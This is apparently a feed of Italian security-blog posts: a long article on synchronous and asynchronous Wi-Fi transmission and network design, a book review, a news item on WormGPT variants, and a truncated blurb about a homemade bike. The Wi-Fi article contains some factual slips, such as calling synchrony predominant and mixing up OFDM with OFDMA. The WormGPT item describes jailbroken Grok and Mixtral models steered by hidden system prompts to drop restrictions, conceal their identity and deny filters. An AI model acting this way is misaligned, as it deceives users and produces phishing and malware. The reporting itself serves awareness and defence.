NB: Anche se oggi la maggior parte delle comunicazioni in rete avviene in modalità seriale, è importante sapere che i dispositivi stessi (come router, access point, schede Wi-Fi) elaborano dati internamente in modalità parallela. I convertitori seriale↔parallelo (e viceversa) sono integrati nei chipset per tradurre i dati in modo efficiente tra le due modalità, a seconda del contesto di trasmissione.
Trasmissione Sincrona e Asincrona nelle reti Wifi
Ogni volta che trasmettiamo dati in rete, non conta solo cosa comunichiamo, ma anche come lo facciamo. In particolare, la trasmissione dei dati in queste reti può essere classificata in due categorie principali: sincrona e asincrona. Questi approcci differiscono nel modo in cui i dispositivi coordinano il trasferimento dei dati, influenzando efficienza, latenza e adattabilità. Questo documento esplora i principi teorici, i meccanismi operativi, gli standard associati e le evoluzioni recenti, con particolare attenzione al contesto delle reti Wi-Fi.
Trasmissione Sincrona
La trasmissione sincrona si basa su una sincronizzazione temporale precisa tra il trasmettitore e il ricevitore. I dati vengono inviati in flussi continui o blocchi regolari, coordinati da un segnale di clock condiviso o da un timing prestabilito.
Caratteristiche principali:
- Sincronizzazione: Entrambi i dispositivi devono essere allineati temporalmente.
- Efficienza: Ridotto overhead di controllo, poiché non sono necessari bit di inizio e fine per ogni pacchetto.
- Applicazioni ideali: Streaming multimediale (es. video o audio) e comunicazioni in tempo reale (es. VoIP).
Vantaggi:
- Minore spreco di banda per dati continui.
- Latenza prevedibile.
Svantaggi:
- Richiede una gestione complessa della sincronizzazione.
- Poco flessibile in ambienti con trasmissioni sporadiche o variabili.
Trasmissione Asincrona
Nella trasmissione asincrona, i dati vengono inviati senza un clock condiviso. Ogni pacchetto include bit di controllo (start e stop) per segnalare l’inizio e la fine della trasmissione, permettendo al ricevitore di interpretare i dati correttamente.
Caratteristiche principali:
- Flessibilità: Non richiede sincronizzazione continua.
- Overhead: Maggiore quantità di dati di controllo per ogni pacchetto.
- Applicazioni ideali: Traffico dati non continuo (es. navigazione web, E-mail).
Vantaggi:
- Adatta a reti con dispositivi multipli e traffico variabile.
- Facilità di implementazione in ambienti dinamici.
Svantaggi:
- Minore efficienza per flussi di dati continui a causa dell’overhead.
Tabella riassuntiva
Fondamenti Teorici della Trasmissione
La trasmissione sincrona si distingue per la necessità di una sincronizzazione temporale precisa tra trasmettitore e ricevitore. In questo caso, i dati fluiscono in blocchi regolari o in un flusso continuo, guidati da un segnale di clock condiviso o da un timing prestabilito. Questo approccio si rivela particolarmente adatto a scenari come lo streaming multimediale o le comunicazioni VoIP, dove la costanza è cruciale. L’assenza di bit di delimitazione riduce l’overhead, garantendo un’elevata efficienza, anche se ciò comporta una maggiore complessità nella gestione della sincronizzazione e una ridotta flessibilità in contesti di traffico variabile.
Al contrario, la trasmissione asincrona opera senza un clock condiviso, affidandosi a bit di start e stop per delimitare ogni pacchetto. Questa caratteristica la rende flessibile e ideale per applicazioni con traffico intermittente, come la navigazione web o la posta elettronica, anche se l’aggiunta di bit di controllo aumenta l’overhead, penalizzando l’efficienza nei flussi continui. La semplicità di implementazione e l’adattabilità a reti dinamiche ne fanno una soluzione ampiamente adottata.
Meccanismi Operativi nelle Reti Wi-Fi
Il cuore delle reti Wi-Fi tradizionali, dagli standard 802.11a fino a 802.11ac, è il protocollo CSMA/CA (Carrier Sense Multiple Access with Collision Avoidance), un meccanismo asincrono. Qui, i dispositivi monitorano il canale per verificarne la disponibilità: se libero, trasmettono; se occupato, attendono un intervallo casuale noto come back-off prima di ritentare. Questo sistema si adatta bene a reti con molteplici dispositivi in competizione, risultando efficace per traffico irregolare, sebbene tenda a generare collisioni e ritardi in ambienti congestionati, limitandone la scalabilità e la prevedibilità della latenza.
Nonostante la predominanza della sincronia, tracce di sincronizzazione emergono in alcuni contesti storici. Il TDMA (Time Division Multiple Access), utilizzato in reti wireless pre-802.11, suddivide il tempo in slot dedicati, mentre i Beacon Frames degli standard 802.11 forniscono una sincronizzazione minima, con segnali periodici trasmessi dagli Access Point per allineare i client su parametri come il Timing Synchronization Function (TSF), pur senza alterare il carattere asincrono della trasmissione dati.
Esempio pratico di trasmissione Sincrona
La Trasmissione Sincrona nelle Reti WiFi per Industria 4.0 e Automazione
L’Industria 4.0 si basa su connettività avanzata, automazione e intelligenza artificiale per migliorare l’efficienza e la produttività nei processi industriali. La trasmissione sincrona nelle reti WiFi gioca un ruolo fondamentale per garantire comunicazioni a bassa latenza tra macchinari, robot e sistemi di controllo. In questo esempio analizziamo le principali tecnologie impiegate per la sincronizzazione dei dispositivi nelle reti WiFi industriali, con un focus su Time-Sensitive Networking (TSN) e Wi-Fi 6/6E. Viene inoltre esaminata l’integrazione tra Wi-Fi e reti 5G private, con particolare attenzione alle applicazioni pratiche e ai benefici in termini di efficienza produttiva, sicurezza e flessibilità operativa.
Negli ultimi anni, la digitalizzazione dell’industria ha portato alla nascita del concetto di Industria 4.0, caratterizzato dall’integrazione di dispositivi intelligenti, robotica avanzata e connettività per ottimizzare i processi produttivi. In questo contesto, la trasmissione sincrona dei dati nelle reti WiFi è essenziale per applicazioni time-critical, dove anche un minimo ritardo nella comunicazione può compromettere l’efficienza operativa.
Le reti WiFi tradizionali, basate su meccanismi di accesso casuale al canale (es. CSMA/CA), non sono progettate per garantire latenze deterministiche. Tuttavia, con l’introduzione di Wi-Fi 6 (802.11ax) e tecnologie come Time-Sensitive Networking (TSN), è ora possibile implementare trasmissioni a bassa latenza e alta affidabilità anche su reti wireless.
Analizziamo quindi le soluzioni di trasmissione sincrona nel contesto industriale, identificando le tecnologie chiave e i loro impatti sulle applicazioni di automazione.
Tecnologie per la Trasmissione Sincrona in WiFi
Time-Sensitive Networking (TSN) su WiFi
Il Time-Sensitive Networking (TSN) è un insieme di standard IEEE 802.1 che permette il trasferimento deterministico dei dati nelle reti wireless, garantendo latenze prevedibili e sincronizzazione temporale precisa.
Le caratteristiche principali di TSN includono:
• IEEE 802.1AS: sincronizzazione dell’orologio di tutti i dispositivi in rete per ridurre la variabilità della latenza.
• IEEE 802.1Qbv: meccanismi di time-aware scheduling per garantire l’invio dei pacchetti in intervalli temporali specifici.
• Prioritizzazione del traffico: i pacchetti critici hanno precedenza rispetto al traffico meno urgente.
L’Evoluzione con Wi-Fi 6: Verso un’Ibridazione
Con lo standard 802.11ax, noto come Wi-Fi 6, il panorama della trasmissione si evolve grazie all’introduzione delle OFDMA (Orthogonal Frequency Division Multiple Access). Questo meccanismo segmenta il canale in sottocanali, o Resource Units, assegnati a dispositivi diversi in modo temporizzato. Pur non raggiungendo una sincronizzazione completa, la OFDM riduce la casualità tipica del CSMA/CA attraverso una programmazione centralizzata gestita dall’Access Point, migliorando l’efficienza e la capacità multiutente in ambienti densi, con una significativa riduzione di latenza e collisioni.
Un ulteriore elemento di controllo è rappresentato dai Trigger Frames, inviati dall’Access Point per coordinare le trasmissioni dei client. Questo sistema attenua la dipendenza dal backoff casuale, rendendo il processo più prevedibile.
Wi-Fi 6 e OFDM per la Comunicazione Industriale
Wi-Fi 6 (802.11ax) introduce il Multiple Access a Divisione di Frequenza Ortogonale (OFDM), una tecnica che consente di suddividere il canale in più sotto-canali (Resource Units, RU) per assegnare a ciascun dispositivo uno slot temporale dedicato.
Questa tecnologia porta significativi vantaggi in ambito industriale:
- Minore latenza e jitter → Comunicazione più stabile e prevedibile tra dispositivi.
- Migliore gestione del traffico → Possibilità di trasmettere simultaneamente dati a più dispositivi senza interferenze.
- Maggiore efficienza dello spettro radio → Riduzione delle collisioni e del tempo di attesa per l’accesso al canale.
Integrazione tra Wi-Fi 6 e 5G per Industria 4.0
L’adozione di reti 5G private negli impianti industriali consente di combinare la copertura e l’affidabilità del 5G con la flessibilità del Wi-Fi 6 per la comunicazione interna.
L’integrazione del Wi-Fi 6 + 5G: ha diversi vantaggi:
- Banda ultra-larga per il trasferimento dati in tempo reale
- Latenza sotto il millisecondo per applicazioni mission-critical
- Separazione del traffico tra rete locale (Wi-Fi) e connettività esterna (5G)
Applicazioni della Trasmissione Sincrona in Industria 4.0
Robot Collaborativi e Automazione Industriale
Nei moderni impianti produttivi, i robot collaborativi (cobot) devono operare in perfetta sincronia con gli esseri umani e altri macchinari. La comunicazione sincrona permette di evitare ritardi nei movimenti, riducendo il rischio di collisioni o errori di assemblaggio. Ad esempio, in un’azienda manifatturiera che utilizza bracci robotici connessi in Wi-Fi 6 e TSN per l’assemblaggio di componenti elettroniche, grazie alla sincronizzazione precisa dei dati, ogni robot riceve i comandi con una latenza prevedibile, garantendo operazioni coordinate.
Veicoli Autonomi e AGV (Automated Guided Vehicles)
Nei magazzini automatizzati, gli AGV (Automated Guided Vehicles) devono ricevere istruzioni in tempo reale per evitare ostacoli e ottimizzare i percorsi di navigazione.
In un centro logistico che impiega AGV connessi a una rete Wi-Fi 6, utilizzando OFDM per assegnare slot temporali specifici a ogni veicolo, questo riduce le interferenze e garantisce la trasmissione istantanea dei comandi di movimento.
Monitoraggio IoT e Manutenzione Predittiva
L’uso di sensori IoT connessi in Wi-Fi permette di raccogliere dati sullo stato delle macchine e prevedere guasti prima che si verifichino. La sincronizzazione dei dati è fondamentale per analizzare in tempo reale le anomalie operative.
In un impianto di produzione, con centinaia di sensori smart che monitorano temperatura, vibrazioni e consumo energetico delle macchine, attraverso un sistema TSN, i dati vengono trasmessi in modo sincrono al cloud per l’analisi predittiva, riducendo i tempi di fermo macchina.
Quali sono quindi i vantaggi e le sfide di questa implementazione?
Vantaggi della Trasmissione Sincrona in WiFi
- Avremo certamente una riduzione della latenza con la conseguenza di avere comunicazioni più rapide tra macchinari.
- Una Maggiore efficienza produttiva dal momento che non avremo nessun ritardo nei processi automatizzati.
- Un’indubbia maggior sicurezza operativa data da una sincronizzazione precisa per evitare guasti e malfunzionamenti.
- Flessibilità e scalabilità dal momento che il Wi-Fi 6 consente di espandere facilmente la rete senza cablaggi complessi.
Le sfide ed i limiti di questa implementazione pongono l’accento su alcuni aspetti che necessitano certamente di attenzioni particolari intervenendo sulla necessità di allocazione di risorse radio in modo ottimale per evitare interferenze e congestioni.
Un altro aspetto non trascurabile sono i “Requisiti dell’ infrastruttura” che, per l’implementazione del Wi-Fi 6 e del TSN richiede aggiornamenti hardware ed una conseguente ed inevitabile protezione dei dati trasmessi tra macchinari e cloud.
E’ indubbio quindi che l’adozione di reti Wi-Fi sincrone, grazie a tecnologie come TSN e Wi-Fi 6, sta rivoluzionando l’Industria 4.0, permettendo comunicazioni affidabili e a bassa latenza tra dispositivi industriali. L’integrazione con il 5G rappresenta un ulteriore passo avanti, offrendo una soluzione ibrida per garantire prestazioni ottimali in ambienti complessi.
Lo sviluppo del Wi-Fi 7 potrebbe portare ulteriori miglioramenti nella trasmissione sincrona, riducendo ulteriormente la latenza e aumentando l’efficienza energetica delle reti industriali.
Trasmissione Asincrona in un Ambiente Aziendale
Si consideri un tipico ambiente aziendale in cui diversi utenti utilizzano la rete WiFi per differenti attività:
- Un impiegato sta scaricando un documento da un server cloud.
- Un altro sta partecipando a una videoconferenza su Zoom.
- Un terzo sta inviando un’E-mail con un allegato di grandi dimensioni.
In questo scenario, tutti i dispositivi condividono lo stesso access point (AP) WiFi e competono per l’accesso al canale di trasmissione.
Competizione per il Canale
l meccanismo CSMA/CA (Carrier Sense Multiple Access with Collision Avoidance), utilizzato in tutte le reti Wi-Fi tradizionali, funziona secondo un principio semplice:
“ascolta prima di parlare”.
Ogni dispositivo verifica che il canale sia libero prima di iniziare a trasmettere. Se rileva traffico, attende un intervallo di tempo casuale (backoff) e ritenta più tardi.
Questo modello ha due grandi vantaggi:
- È semplice e flessibile.
- Funziona bene in scenari con traffico leggero e variabile.
Ma presenta limiti strutturali:
- Nessuna garanzia di priorità.
- Nessuna prevedibilità nella trasmissione.
- Prestazioni che crollano all’aumentare dei dispositivi connessi.
In un ambiente affollato, più dispositivi tentano di trasmettere contemporaneamente. Ne derivano collisioni, ritrasmissioni, e un drastico aumento di:
- latenza (tempo tra richiesta e risposta),
- jitter (variabilità nel tempo di trasmissione),
- packet loss (perdita di pacchetti, spesso invisibile agli utenti ma letale per servizi real-time come VoIP o videoconferenze).
Dalla contesa al controllo: come limitare e gestire il traffico Wi-Fi
Fortunatamente, esistono tecniche consolidate per trasformare la trasmissione Wi-Fi da best-effort a gestita, assegnando priorità al traffico importante e limitando l’impatto dei dispositivi meno critici.
Gestione della Qualità del Servizio (QoS) Il protocollo IEEE 802.11e introduce la possibilità di abilitare meccanismi QoS direttamente sulla rete Wi-Fi. Questo significa che non tutti i pacchetti sono uguali: possiamo definire classi di traffico e trattarle in modo diverso.
Il WMM (Wi-Fi Multimedia subset di 802.11e) è lo standard QoS più usato nelle reti Wi-Fi moderne. Divide il traffico in quattro categorie di priorità:
WMM assegna a ciascuna classe:
- un tempo minimo di attesa prima di poter trasmettere,
- una finestra di contesa più o meno ampia,
- una frequenza di trasmissione differenziata.
In pratica: una videochiamata viene favorita rispetto a un backup automatico in background, evitando che un traffico secondario comprometta un’attività come la video chiamata che richiede un flusso continuo e stabile.
I test effettuati in reti aziendali mostrano che la trasmissione asincrona è adatta per attività best-effort, come la navigazione web e il trasferimento di file, ma presenta limitazioni per applicazioni time-sensitive, come la telepresenza e il controllo remoto di dispositivi. Per mitigare questi problemi, vengono spesso implementate tecniche di QoS (Quality of Service) e meccanismi di prioritizzazione del traffico.
t1) Tabella dettagliata che confronta le prestazioni della rete WiFi aziendale per applicazioni best-effort e time-sensitive, con e senza QoS (Quality of Service).
Analizzando le tabelle ne deduciamo che:
Le applicazioni Best-Effort (Navigazione Web e Download):
- Anche senza QoS, la latenza e la perdita di pacchetti sono basse.
- L’abilitazione del QoS migliora leggermente le prestazioni, ma non è fondamentale.
Le applicazioni con Latenza Sensibile (Streaming Video e Videoconferenza):
- Senza QoS, si osservano latenze elevate e un jitter significativo, con impatti negativi sulla qualità del servizio.
- Con QoS, la latenza scende drasticamente, riducendo problemi di buffering e ritardi.
Le Applicazioni Time-Sensitive Critiche (Controllo Remoto IoT):
- Senza QoS, i tempi di risposta sono troppo elevati per garantire un controllo efficace.
- Con QoS, la latenza e il jitter migliorano sensibilmente, permettendo un funzionamento affidabile.
Risulta quindi che QoS ha un impatto minimo sulle applicazioni best-effort, che possono funzionare bene anche senza priorità nella rete.
Per applicazioni time-sensitive, il QoS è fondamentale per garantire prestazioni stabili e ridurre problemi di latenza e perdita di pacchetti.
Senza QoS, il controllo remoto e le videoconferenze subiscono ritardi significativi, compromettendo l’usabilità delle applicazioni.
Vantaggi e Limiti della Trasmissione Asincrona
Vantaggi
- Maggior flessibilità: I dispositivi possono trasmettere dati senza bisogno di sincronizzazione globale.
- Efficienza nella Condivisione del Canale: Il protocollo CSMA/CA permette a più dispositivi di utilizzare lo stesso canale senza coordinazione centralizzata.
- Adattabilità a Reti Dinamiche: Adatto per ambienti in cui il numero di dispositivi cambia frequentemente.
Limiti
- Latenza variabile → Le trasmissioni possono subire ritardi a seconda della congestione del canale.
- Possibili collisioni → Il traffico elevato può causare aumenti nel tempo di attesa per la trasmissione.
- Prestazioni inferiori per applicazioni real-time → Le applicazioni che richiedono una latenza costante possono subire degradazioni.
La trasmissione asincrona, quindi, è una caratteristica intrinseca delle reti WiFi basate su CSMA/CA, fornendo un meccanismo di accesso al canale efficiente ma non deterministico. Sebbene sia adatta per la maggior parte delle applicazioni di rete tradizionali, presenta limitazioni per scenari in cui la latenza deve essere prevedibile e controllata.
Analisi Comparativa
La trasmissione sincrona richiede un clock condiviso, presenta un basso overhead ed eccelle nei flussi continui, come streaming e VoIP, ma manca di flessibilità. La trasmissione asincrona, priva di sincronizzazione rigida, comporta un overhead maggiore ed è più efficace per dati sporadici, come navigazione ed E-mail, grazie alla sua adattabilità. Nel Wi-Fi tradizionale, il CSMA/CA domina come approccio asincrono, mentre con Wi-Fi 6 OFDM introduce elementi sincroni, pur mantenendo una base asincrona.
Tecniche avanzate per una rete Wi-Fi più intelligente
La pianificazione di una rete è fondamentale per un’implementazione di successo, mira a raccogliere/validare gli aspetti progettuali necessari per una determinata soluzione. La sezione seguente illustra una parte della progettazione e della pianificazione per la rete LAN wireless. Gli elementi progettuali influenzano la progettazione della WLAN, ma anche di altri componenti dell’architettura (ad esempio, LAN, WAN, sicurezza, ecc.).
SSID, Access Point e Wi-Fi intelligente: come progettare reti efficienti, sicure e scalabili
In un’epoca in cui il Wi-Fi è diventato il sistema nervoso digitale di aziende, scuole, ospedali e spazi pubblici, progettare correttamente una rete wireless non è più un esercizio tecnico: è una sfida strategica. Non basta garantire la copertura del segnale. Bisogna assicurare capacità, sicurezza, affidabilità e scalabilità.
Quanti utenti per ogni Access Point?
Il primo passo è condurre una doppia indagine: una sulla copertura, l’altra sulla capacità. Non basta che il segnale arrivi ovunque: deve reggere il carico di connessioni simultanee, senza rallentamenti o disconnessioni.
Occorre valutare quanti utenti utilizzeranno la rete, con quanti dispositivi per ciascuno (smartphone, laptop, o, tablet…) e quali tipologie. La scelta e il numero degli Access Point (AP) devono rispecchiare questa analisi. In ambienti ad alta densità – come auditorium o open space – può essere preferibile utilizzare bande strette da 20 MHz, che riducono le interferenze e migliorano la distribuzione del traffico.
SSID: pochi, mirati e gestiti con intelligenza
Una rete Wi-Fi può teoricamente trasmettere decine di SSID, ma nella pratica ogni SSID aggiuntivo genera overhead radio, rubando tempo utile alla trasmissione dei dati. La raccomandazione di solito è quella di: non superare i 5 SSID per ogni AP, e idealmente fermarsi a 3 per ambiente condiviso.
Per evitare la proliferazione inutile di SSID, si consiglia di adottare l’assegnazione di VLAN dinamica tramite autenticazione RADIUS. Questo approccio consente di segmentare il traffico in modo logico, assegnando automaticamente ogni utente o dispositivo alla VLAN corretta in base alle credenziali di accesso e ai relativi privilegi.
In questo modo, con un unico SSID, è possibile gestire più profili di accesso, creando così una rete più ordinata, sicura e performante.
NB: Un errore comune è creare un SSID per ogni VLAN. Le ultime best practice suggeriscono l’opposto: un SSID per ogni profilo d’uso (dipendenti, ospiti, IoT, esterni), sfruttando l’autenticazione per distinguere ruoli e assegnare dinamicamente le policy corrette.
Visibilità degli SSID: serve davvero nasconderli?
La visibilità degli SSID è spesso oggetto di dibattito. Alcuni preferiscono nascondere le reti non pubbliche, ma questo approccio offre benefici minimi in termini di sicurezza. Gli SSID nascosti continuano a trasmettere sonde 802.11, e i dispositivi che le cercano espongono potenzialmente i loro dati.
Inoltre, nascondere un SSID richiede configurazioni manuali su ogni dispositivo, aumentando il carico per il team IT. Meglio allora usare tag sugli Access Point per trasmettere ogni SSID solo nelle zone in cui è necessario, senza rendere la rete invisibile né ubiqua.
Ne abbiamo parlato anche nel nostro articolo della rubrica: “Proteggere il WiFi nascondendo il nome? Si tratta di una falsa sicurezza”
Crittografia: scegliere la sicurezza compatibile
Quando si sceglie la crittografia, il principio è semplice: massima sicurezza compatibile con tutti i dispositivi connessi. WPA 3 è lo standard più sicuro, ma non tutti i clienti lo supportano. In questi casi, WPA2 rappresenta spesso il miglior compromesso.
Attenzione alla modalità mista WPA2/WPA 3: può causare instabilità e comportamenti imprevedibili. È meglio segmentare gli accessi e garantire che ogni SSID utilizzi il livello di crittografia più alto possibile, ma supportato da tutti i client.
Infine, è fondamentale tenere aggiornato il firmware degli Access Point e verificare regolarmente i changelog dei produttori: molte vulnerabilità note vengono corrette proprio tramite aggiornamenti, e ignorarli può aprire falle inattese.
Conclusione: best practices per progettare una rete Wi-Fi professionale
La qualità di una rete wireless non dipende solo dalla potenza del segnale, ma da come viene organizzata, segmentata e monitorata. Ecco alcune regole fondamentali:
- Limitare il numero di SSID (massimo 3–5 per AP)
- Associare SSID ai casi d’uso, non alle VLAN
- Sfruttare VLAN dinamiche e policy RADIUS
- Evitare SSID nascosti, salvo esigenze specifiche
- Segmentare l’accesso in base al livello di sicurezza
- Verificare la compatibilità dei client prima di implementare WPA3
- Tenere firmware e controller sempre aggiornati
Una rete ben progettata è invisibile all’utente… ma fa la differenza ogni giorno.
Traffic Shaping: modellare il traffico Wi-Fi per garantire qualità e performance
In una rete wireless ben progettata, la qualità del servizio non si improvvisa. A fare la differenza è spesso la capacità di gestire in modo intelligente il traffico dati, specialmente in ambienti ad alta densità di utenti. Qui entra in gioco il traffic shaping, una funzione avanzata ma essenziale, che permette di modellare dinamicamente la banda disponibile in base a criteri predefiniti.
Limiti per SSID, client e applicazione
Il primo livello di ottimizzazione si applica direttamente agli Access Point. È infatti raccomandato configurare il traffic shaping sul bordo di accesso, ossia sugli AP stessi, dove il traffico incontra per la prima volta la rete cablata.
Una buona prassi nei contesti ad alta densità (aule universitarie, sale conferenza, eventi) è limitare la banda per utente a 5 Mbps. Questo garantisce un’esperienza fluida senza saturare il canale radio. In casi particolari – per dispositivi critici o applicazioni come Webex o Teams – è possibile definire eccezioni specifiche, modulando la priorità in base a singoli client, host o sottoreti.
Un’opzione interessante può essere quella del tipo Speed Burst di Cisco Meraki, che consente di quadruplicare temporaneamente il limite assegnato per 5 secondi, offrendo una rapida accelerazione in risposta a picchi brevi di traffico (come il caricamento di una presentazione o un video educativo).
Le regole: priorità, gerarchia e granularità
Solitamente le piattaforme di gestione WiFi consentono di scegliere tra regole predefinite oppure personalizzabili. Le regole vengono applicate in ordine dall’alto verso il basso, e il traffic shaping può essere costruito su base:
- SSID
- Singolo utente
- Applicazione o protocollo
- Host o subnet
- Classe di servizio (QoS, DSCP, WMM)
L’approccio può essere globale (per tutti gli utenti di un SSID), oppure granulare: ad esempio, si può assegnare un profilo a gruppi LDAP, ad attributi RADIUS, a device specifici, o addirittura al singolo utente tramite il suo client page. La priorità segue una gerarchia ben definita, dove le policy locali sovrascrivono quelle globali, garantendo flessibilità senza compromettere il controllo centrale.
NB: Nella maggior parte dei casi, lo shaping non agisce sulla velocità radio (PHY rate), ma sul flusso di traffico reale che attraversa l’infrastruttura cablata. Si tratta quindi di una gestione “a valle” che incide direttamente sull’efficienza complessiva del backbone di rete.
Broadcast ottimizzati, video senza interruzioni
Un altro vantaggio chiave offerto dagli Access Point evoluti è la capacità di ottimizzare la trasmissione video e ridurre il rumore radio.
Attraverso il protocollo IGMP, i pacchetti multicast vengono convertiti in unicast, permettendo di trasmettere contenuti video in alta qualità a molti client contemporaneamente, senza congestione. Questo è particolarmente utile in contesti educativi, dove decine di studenti possono guardare la stessa lezione in streaming senza penalizzare a vicenda.
Gli stessi AP limitano automaticamente i broadcast duplicati, evitando tempeste di pacchetti che saturano la banda e consumano rapidamente la batteria dei dispositivi mobili. In altre parole, non solo la rete è più veloce, ma anche più efficiente dal punto di vista energetico.
In sintesi
Il Wi-Fi, per natura, nasce equo ma ingenuo: tutti possono parlare, ma nessuno ha il controllo.
Con le tecniche sopra descritte, possiamo dare le giuste priorità e performance a ciò che conta tenendo sotto controllo il resto.
Un requisito oggi essenziale, soprattutto dove la rete wireless non è più un servizio di supporto, ma il cuore pulsante della produttività.
Prospettive e Sviluppi Futuri
L’espansione nella banda dei 6 GHz con Wi-Fi 6E e l’arrivo di Wi-Fi 7 (802.11be) segnano un ulteriore passo avanti. Tecnologie come il Multi-Link Operation (MLO) consentono l’uso simultaneo di più bande, richiedendo una sincronizzazione più avanzata per rispondere alla crescente densità di dispositivi, inclusi quelli IoT. Il futuro delle reti Wi-Fi sembra orientarsi verso un equilibrio tra la flessibilità della sincronia e l’efficienza della sincronia, con protocolli ibridi capaci di adattarsi dinamicamente al traffico. Il Diagramma 6: Evoluzione degli Standard Wi-Fi traccia questa transizione, mostrando il passaggio da un approccio asincrono puro a un modello ibrido lungo la linea temporale degli standard.
Le reti Wi-Fi hanno tradizionalmente privilegiato l’asincronia, incarnata dal CSMA/CA, per la sua capacità di adattarsi a scenari dinamici. Con Wi-Fi 6 e l’adozione delle OFDMA, tuttavia, si assiste a un’integrazione di elementi sincroni che ottimizzano efficienza e scalabilità e con il Wi-Fi 7 potrebbero migliorare la gestione della trasmissione dati, riducendo la variabilità della latenza e ottimizzando le prestazioni delle reti wireless.
In prospettiva futura l’adozione di reti ibride Wi-Fi 6/5G e tecniche avanzate di QoS e Edge computing potrebbe migliorare ulteriormente le prestazioni della trasmissione asincrona in ambienti ad alta densità di dispositivi.
Con Wi-Fi 6E, Wi-Fi 7 e l’integrazione con reti 5G private, ci avviciniamo a un modello di rete dinamico e adattivo, capace di bilanciare efficienza, sicurezza e bassa latenza. Ma attenzione: maggiore complessità equivale a maggiore esposizione. MLO, OFDMA, slicing e scheduling dinamico introducono nuovi vettori d’attacco, specialmente in ambienti OT e industriali.
Conclusione
Noi di RHC pensiamo sia il momento di investire in competenze, per poter gestire in modo consapevole le reti Wireless. Segmentazione, client isolation, QOS e traffic shaping, e soprattutto monitoraggio continuo e threat detection a livello di accesso. La rete Wi-Fi, da semplice comodità, è diventata parte integrante della superficie di rischio aziendaleLa vera sfida non è scegliere tra sincrono e asincrono, ma sapere quando e dove usarli. Le reti ibride del futuro (Wi-Fi 6/7, 5G, edge computing) vanno proprio in questa direzione: adattare il comportamento della rete al tipo di traffico, e non il contrario.
L'articolo Sicurezza Reti Wi-Fi: La Sfida e le Soluzioni Adattive per l’Era Digitale proviene da il blog della sicurezza informatica.
Tecnopolitica, come la tecnologia ci rende soldati
Per indagare gli obiettivi delle cyberpotenze è necessario un nuovo paradigma interpretativo, quello della Tecnopolitica. A dirlo è la ricercatrice francese linkedin.com/in/ACoAAAvyBNoBrR…Asma MHALLA, che con il suo Tecnopolitica. Come la tecnologia ci rende soldati (2025, add Editore, Torino) continua l’opera dei teorici francesi che nel deserto delle democrazie irriflessive ancora mostrano la capacità di criticare le Big Tech che organizzano le nostre vite.
Secondo Mhalla la tecnologia è infatti portatrice di un progetto politico e ideologico totale data la sua volontà di potenza e di controllo illimitato in quanto non organizza solo la quotidianità ma influenza la percezione del mondo, frammentando la realtà e polarizzando gli individui e la società.
Le BigTech, secondo la ricercatrice, sono protagoniste di questo scenario che ridefinisce costantemente la morfologia delle nostre rappresentazioni collettive di Stato, democrazia sovranità, trasformandoci tutti in soldati passivi del cyberspazio inteso come spazio ultimo di produzione di senso, ricchezza e conflittualità, un’estensione del dominio della guerra.
Un contesto in cui Big Tech e Big State si alimentano a vicenda e pertanto la sua analisi si concentra da un lato sulle tecnologie che sono sempre e comunque dual use, consentendo ad esempio la massificazione degli attacchi cibernetici; dall’altra sul loro sviluppo intrinsecamente autoritario e fortemente iperliberista come nel caso di X, un luogo che promuove l’ultra libertà di ciascuno a discapito di quella degli altri trasformando ogni cittadino in un potenziale target di destabilizzazione.
L’ideologia mondo di questo potere iper-tecnologico è indagato dalla studiosa con gli attrezzi della filosofia politica e della critica epistemologica, da Marx a Foucault passando per Annah Arendt e Jacques Ellul. Il Panopticon creato da Big Tech è reso possibile secondo lei da un dispotismo mite garantito dal controllo tecnologico della vita privata anche attraverso la brutalizzazione della parola, polarizzata dai meccanismi di viralità algoritmica, scimmiottata dalle intelligenze artificiali generative, militarizzata dalle guerre di propaganda. Forte è infatti la sua critica all’intelligenzartificiale, frutto di un sogno di efficienza, di potere e di potenza visto che ambisce a diventare l’infrastruttura del tutto. Ma nell’interesse di chi?
Per riaffermare il progetto politico democratico e contrastare l’iperpotere della tecnologia l’unica soluzione secondo la studiosa appare essere quella di comprendere come sfuggire alla dottrina dell’informazione totale e allontanare così lo spettro dell’iperguerra, cominciando a difenderci dal sovraccarico cognitivo determinato dall’attacco della Tecnologia, l’attacco alla mente.
Tecnopolitica. Come la tecnologia ci rende soldati
Due varianti di WormGPT usano le API di Grok e Mixtral per produrre malware, phishing e truffe di ogni tipo
Due nuove varianti di WormGPT, un modello linguistico dannoso, sono state scoperte e analizzate nel 2025. Queste versioni sono basate sui modelli Grok e Mixtral e sono in grado di generare contenuti malevoli come email di phishing, truffe BEC e script malware senza alcuna restrizione. Sono state pubblicate sul forum criminale BreachForums tra ottobre 2024 e febbraio 2025.
CATO Networks ha confermato l’autenticità delle due nuove versioni, create dagli utenti xzin0vich e Keanu. Entrambe le varianti sono accessibili tramite Telegram e offrono modalità di utilizzo su abbonamento o con pagamento una tantum. A differenza della prima versione di WormGPT basata su GPT-J, queste nuove iterazioni sfruttano modelli LLM esistenti con un uso creativo e illecito dei prompt.
Recentemente, i ricercatori di Cato hanno impiegato tecniche di jailbreaking per ottenere informazioni interne sui modelli sottostanti. Le indagini hanno rivelato che xzin0vich-WormGPT utilizza Mixtral, mentre Keanu-WormGPT è costruito su Grok. Entrambi i modelli sono stati manipolati attraverso prompt di sistema nascosti, che guidano il comportamento dell’IA per evitare restrizioni e generare contenuti pericolosi.
Durante i test, le varianti hanno generato senza difficoltà email di phishing, script PowerShell e eseguibili dannosi volti a compromettere Windows 11. I prompt di sistema includevano istruzioni per mantenere segreta l’identità del modello e per non ammettere alcun tipo di filtro o vincolo.
Questo dimostra come i criminali possano sfruttare le API di modelli noti, aggirando le protezioni con prompt ingegnerizzati.
Gli esperti di CATO evidenziano come queste IA modificate rappresentino un rischio crescente per la cybersecurity. Raccomandano l’adozione di misure come il Threat Detection & Response (TDR), il Zero Trust Network Access (ZTNA) e la formazione alla sicurezza per i dipendenti.
Oltre a WormGPT, stanno emergendo anche altri modelli simili nel dark web, tra cui FraudGPT, EvilGPT e DarkGPT, che aumentano ulteriormente la superficie d’attacco.
L'articolo Due varianti di WormGPT usano le API di Grok e Mixtral per produrre malware, phishing e truffe di ogni tipo proviene da il blog della sicurezza informatica.
Building the Marauder LowRacer from Bike Parts
Thanks to [Radical Brad] for writing in to let us know about his recent project, building a street racing bike from square tubing and old bike parts.
In this 50 minute video [Radical Brad] takes us through the process of building the Marauder v2, a street racing LowRacer. The entire build was done over a few weekends using only an AC welder, angle grinder, and basic hand tools you probably have in the garage.
